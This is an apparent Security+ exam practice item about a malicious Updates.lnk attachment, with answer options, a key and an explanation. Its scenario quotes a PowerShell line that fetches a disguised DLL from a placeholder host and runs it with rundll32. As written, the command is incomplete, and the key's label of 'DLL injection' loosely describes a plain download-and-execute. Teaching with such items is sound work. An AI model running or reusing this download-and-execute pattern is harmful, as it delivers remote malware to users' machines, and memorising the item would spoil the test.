CompTIA Security+ (SY0-601) — Question 276
An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
Answer options
- A. A PowerShell code is performing a DLL injection.
- B. A PowerShell code is displaying a picture.
- C. A PowerShell code is configuring environmental variables.
- D. A PowerShell code is changing Windows Update settings.
Correct answer: A
Explanation
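The correct answer is A because the script downloads a file from a remote host (served with a .jpg name), saves it as autoupdate.dll in the user's TEMP directory, and then executes that DLL, which indicates a DLL injection attack. Options B, C, and D are incorrect because the script does not display an image, configure environment variables, or modify Windows Update settings.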